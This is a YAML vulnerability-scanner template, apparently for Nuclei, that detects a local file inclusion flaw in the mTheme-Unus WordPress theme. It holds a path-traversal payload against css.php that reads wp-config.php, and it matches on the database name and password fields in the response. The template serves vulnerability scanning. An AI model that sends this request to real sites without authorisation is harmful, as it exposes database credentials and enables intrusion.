30 lines
781 B
YAML
30 lines
781 B
YAML
id: mthemeunus-lfi
|
|
|
|
info:
|
|
name: mTheme-Unus Theme - Local File Inclusion (LFI)
|
|
author: dhiyaneshDk
|
|
severity: high
|
|
description: The mTheme-Unus WordPress Theme was affected by a css.php Local File Inclusion security vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
|
|
- https://packetstormsecurity.com/files/133778/
|
|
tags: wordpress,wp-theme,lfi,wordpress,mtheme
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "DB_NAME"
|
|
- "DB_PASSWORD"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|